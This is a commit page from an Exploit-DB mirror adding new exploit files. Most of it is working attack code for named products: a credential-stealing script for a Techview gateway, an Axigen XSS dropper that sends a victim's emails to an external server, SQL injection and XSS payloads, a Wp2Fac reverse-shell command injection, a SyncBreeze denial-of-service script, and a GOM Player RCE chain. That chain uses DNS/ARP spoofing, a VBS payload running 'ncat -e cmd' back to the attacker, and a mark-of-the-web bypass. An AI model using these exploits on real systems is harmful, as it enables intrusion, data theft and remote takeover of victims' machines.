bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-09-09

Browse source 
16 changes to exploits/shellcodes/ghdb

Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS

Drupal 10.1.2 - web-cache-poisoning-External-service-interaction

Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure

soosyze 2.0.0 - File Upload

SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection

Wordpress Plugin Elementor 3.5.5 - Iframe Injection

Wp2Fac - OS Command Injection

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

SyncBreeze 15.2.24 - 'login' Denial of Service

GOM Player 2.3.90.5360 - Buffer Overflow (PoC)

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
This commit is contained in:
Exploit-DB 2023-09-09 00:16:33 +00:00
parent 54971d143b
commit cbe784b087
16 changed files with 1092 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

77
exploits/hardware/remote/51720.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
#!/opt/homebrew/bin/python3
import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
if os.name == 'posix':
clr_cmd = ('clear')
elif os.name == 'nt':
clr_cmd = ('cls')
os.system(clr_cmd)
print ("[+]****************************************************[+]")
print (" | Author : The Security Team |")
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
print (" | Description : TechVIEW LA-5570 Directory Traversal |")
print (" | Usage : "+sys.argv[0]+" <target> |")
print ("[+]****************************************************[+]")
def usage():
print (f"Usage: {sys.argv[0]} <target>")
def main(target):
domain = "http://"+target+"/config/system.conf"
try:
url = domain.strip()
r = requests.get(url, verify=False, timeout=3)
print ("[+] Retrieving credentials", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
if ("system_password" in r.text):
data = (r.text.split("\n"))
print (f"\n{data[1]}")
else:
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
except TimeoutError:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
except KeyboardInterrupt:
return
except requests.exceptions.Timeout:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
return
if __name__ == '__main__':
if len(sys.argv)>1:
banner()
target = sys.argv[1]
try:
validate = ipaddress.ip_address(target)
if (validate):
main (target)
except ValueError as e:
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)

80
exploits/multiple/webapps/51722.txt Normal file
View file

@ -0,0 +1,80 @@
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.04370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
document.body.appendChild(x)
})//
Encoded form
/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
Exploit code
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
document.body.appendChild(script_tag);
}
};
xhr3.send();
}
}
};
var body = JSON.stringify({isUnread: false});
xhr2.send(body);
}
};
xhr1.send();
Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.

41
exploits/php/webapps/51714.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection
# Exploit Author: CraCkEr
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Version: 1.9.0.3
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4548
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /search
GET parameter 'filter[brandid]' is vulnerable to SQL Injection
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black
---
Parameter: filter[brandid] (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
---
[-] Done

108
exploits/php/webapps/51715.txt Normal file
View file

@ -0,0 +1,108 @@
## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure
## Author: nu11secur1ty
## Date: 08/27/2023
## Vendor: https://jorani.org/
## Software: https://demo.jorani.org/session/login
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Reference: https://portswigger.net/web-security/information-disclosure
## Description:
The value of the `language request` parameter is copied into a
JavaScript string which is encapsulated in double quotation marks. The
payload 75943";alert(1)//569 was submitted in the language parameter.
This input was echoed unmodified in the application's response.
The attacker can modify the token session and he can discover
sensitive information for the server.
STATUS: HIGH-Vulnerability
[+]Exploit:
```POST
POST /session/login HTTP/1.1
Host: demo.jorani.org
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK
Origin: http://demo.jorani.org
Upgrade-Insecure-Requests: 1
Referer: http://demo.jorani.org/session/login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 183
csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
date: Sun, 27 Aug 2023 06:03:04 GMT
content-type: text/html; charset=UTF-8
Content-Length: 681
server: Apache
x-powered-by: PHP/8.2
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;
expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;
SameSite=Strict
set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;
expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;
SameSite=Lax
last-modified: Sun, 27 Aug 2023 06:03:04 GMT
vary: Accept-Encoding
cache-control: private, no-cache, no-store, proxy-revalidate,
no-transform, must-revalidate
pragma: no-cache
x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1
x-iplb-instance: 27474
connection: close
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: 8192</p>
<p>Message: strlen(): Passing null to parameter #1 ($string) of type
string is deprecated</p>
<p>Filename: controllers/Connection.php</p>
<p>Line Number: 126</p>
</div>
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Warning</p>
<p>Message: Cannot modify header information - headers already sent
by (output started at
/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p>
<p>Filename: helpers/url_helper.php</p>
<p>Line Number: 565</p>
</div>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)
## Time spend:
01:35:00

15
exploits/php/webapps/51716.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953
# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K

38
exploits/php/webapps/51717.py Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A
import requests
def send_post_request(host, revshell):
url = f'http://{host}/send.php'
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': f'http://{host}',
'Connection': 'close',
'Referer': f'http://{host}/',
}
data = {
'numara': f'1234567890 & {revshell} &;'
}
response = requests.post(url, headers=headers, data=data)
return response.text
host = input("Target IP: ")
revshell = input("Reverse Shell Command: ")
print("Check your listener!")
send_post_request(host, revshell)

42
exploits/php/webapps/51718.txt Normal file
View file

@ -0,0 +1,42 @@
## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload
## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.
STATUS: HIGH Vulnerability
[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
<title>Hello broken file upload logic, now I can read your special
directory pats, thank you ;)</title>
</head>
<body>
<h1>
<?php
phpinfo();
?>
</h1>
</body>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)
## Time spend:
01:27:00

88
exploits/php/webapps/51723.txt Normal file
View file

@ -0,0 +1,88 @@
## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction
## Author: nu11secur1ty
## Date: 08/30/2023
## Vendor: https://www.drupal.org/
## Software: https://www.drupal.org/download
## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http
## Description:
It is possible to induce the application to perform server-side HTTP
requests to arbitrary domains.
The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was
submitted in the HTTP Host header.
The application performed an HTTP request to the specified domain. For
the second test, the attacker stored a response
on the server with malicious content. This can be bad for a lot of
users of this system if the attacker spreads a malicious URL
and sends it by email etc. By using a redirect exploit.
STATUS: HIGH-Vulnerability
[+]Exploit:
```GET
GET /drupal/web/?psp4hw87ev=1 HTTP/1.1
Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com
Accept-Encoding: gzip, deflate, psp4hw87ev
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,
text/psp4hw87ev
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111
Safari/537.36 psp4hw87ev
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Origin: https://psp4hw87ev.pwnedhost.com
```
[+]Response from Burpcollaborator server:
```HTTP
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62
<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>
```
[+]Response from Attacker server
```HTTP
192.168.100.45 - - [30/Aug/2023 05:52:56] "GET
/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)
## Time spend:
03:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

2
exploits/python/webapps/51676.py
View file

@ -2,8 +2,6 @@
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Maltrail v0.53
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163
# PoC
import sys;

35
exploits/windows/dos/51725.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
# Date: 30/08/2023
# Exploit Author: mohamed youssef
# Vendor Homepage: https://www.syncbreeze.com/
# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
# Version: 15.2.24
# Tested on: windows 10 64-bit
import socket
import time
pyload="username=admin&password="+'password='*500+""
request=""
request+="POST /login HTTP/1.1\r\n"
request+="Host: 192.168.217.135\r\n"
request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
request+="Accept-Language: en-US,en;q=0.5\r\n"
request+="Accept-Encoding: gzip, deflate\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: "+str(len(pyload))+"\r\n"
request+="Origin: http://192.168.217.135\r\n"
request+="Connection: keep-alive\r\n"
request+="Referer: http://192.168.217.135/login\r\n"
request+="Upgrade-Insecure-Requests: 1\r\n"
request+="\r\n"
request+=pyload
print (request)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.217.135",80))
s.send(request.encode())
print (s.recv(1024))
s.close()
time.sleep(5)

29
exploits/windows/local/51724.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 30.08.2023
# Vendor Homepage: https://www.gomlab.com
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Tested Version: 2.3.90.5360 (latest)
# Tested on: Windows 11 64bit
# Thanks to: M. Akil GÜNDOĞAN
# - Open GOM Player
# - Click on the gear icon above to open settings
# - From the menu that appears, select Audio
# - Click on Equalizer
# - Click on the plus sign to go to the "Add EQ preset" screen
# - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
# - Crashed!
#!/usr/bin/python
exploit = 'A' * 260
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC is not created")

119
exploits/windows/remote/51719.py Executable file
View file

@ -0,0 +1,119 @@
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
# Vulnerability Description:
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
# Full disclosure, developers should be more careful about software security.
# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
# Some spaghetti and a bad code but it works :)
banner = """\033[38;5;196m+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+\033[0m""" +"""
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
import time,os,zipfile,subprocess,socket,sys
print(banner)
if os.geteuid() != 0:
print("You need root privileges to run the exploit, please use sudo...")
sys.exit(1)
targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")
def fCreate(fileName,fileContent): # File create func.
f = open(fileName,"w")
f.write(fileContent)
f.close()
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
print("\n[*]- Stage 1: Downloading neccesary tools...")
smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print(" [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print(" [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print(" [*] - DNSSpoof.py has been downloaded.")
print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability.
smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
print("[*]- Stage 3: Creating Attacker Web Page...")
# change this (optional)
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""
fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell")
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)
urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability.
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")
with zipfile.ZipFile(zipName, "w") as malzip:
malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's neccesary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

13
files_exploits.csv
View file

@ -3924,6 +3924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
51720,exploits/hardware/remote/51720.py,"Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities",2023-09-08,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-09-08,2023-09-08,0,CVE-2023-34723,,,,,
20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,remote,hardware,,2001-04-25,2012-08-25,1,CVE-2001-0484;OSVDB-551,,,,,https://www.securityfocus.com/bid/2659/info
19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",remote,hardware,,1999-11-17,2012-07-06,1,CVE-1999-1508;OSVDB-113,,,,,https://www.securityfocus.com/bid/806/info
6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,,
@ -11639,6 +11640,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18117,exploits/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Blind SQL Injection",2011-11-15,"Jose Carlos de Arriba",webapps,multiple,,2011-11-19,2017-11-06,0,CVE-2011-4801;OSVDB-75656,,,,,
50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",2022-06-14,"Andrea Intilangelo",webapps,multiple,,2022-06-14,2022-06-14,0,CVE-2022-29296,,,,,
48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,,2020-06-12,2020-06-12,0,CVE-2020-7030,,,,,
51722,exploits/multiple/webapps/51722.txt,"Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS",2023-09-08,AmirZargham,webapps,multiple,,2023-09-08,2023-09-08,0,CVE-2022-31470,,,,,
31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,,2008-04-18,2014-02-16,1,,,,,,https://www.securityfocus.com/bid/28848/info
35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,webapps,multiple,,2011-01-18,2014-11-13,1,,,,,,https://www.securityfocus.com/bid/45911/info
48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,,2020-09-25,2020-09-25,0,,,,,,
@ -17234,6 +17236,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,webapps,php,,2009-12-20,,0,,,,,,
9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
